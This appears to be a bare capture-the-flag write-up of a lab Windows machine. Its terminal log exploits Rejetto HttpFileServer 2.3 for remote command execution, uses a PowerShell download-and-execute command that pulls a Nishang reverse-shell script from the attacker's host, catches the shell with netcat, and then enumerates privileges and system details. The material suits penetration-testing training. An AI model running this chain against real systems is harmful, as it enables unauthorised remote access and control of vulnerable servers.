2 :80
HttpFileServer 2.3
$ searchsploit httpfileserver
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
$ python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18/rev.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|c%3A%5Cwindows%5CSysNative%5CWindowsPowershell%5Cv1.0%5Cpowershell.exe%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.10.14.18/rev.ps1%27%29.}
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [08/May/2021 11:33:38] "GET /rev.ps1 HTTP/1.1" 200 -
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.8] 49162
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
optimum\kostas
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
systeminfo
Host Name: OPTIMUM
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
System Type: x64-based PC
Hotfix(s): 31 Hotfix(s) Installed.
cmd.exe /c dir /b %windir%\Microsoft.NET\Framework\v*
v1.0.3705
v1.1.4322
v2.0.50727
v4.0.30319
Last updated